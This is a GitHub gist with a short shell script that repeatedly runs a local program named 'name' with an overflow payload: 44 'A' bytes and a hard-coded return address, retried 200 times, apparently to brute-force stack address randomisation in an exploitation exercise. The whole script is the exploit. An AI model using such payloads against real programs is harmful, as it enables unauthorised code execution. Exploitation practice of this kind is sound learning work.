Created
October 21, 2016 14:08
-
-
Save RdlP/8d57f97022e74d97dd5083501275de8a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| for i in `seq 1 200`; | |
| do | |
| echo "Número de intentos: $i" | |
| ./name `python -c "print 'A'*44 + '\xbc\x6c\xb5\xff'"` | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment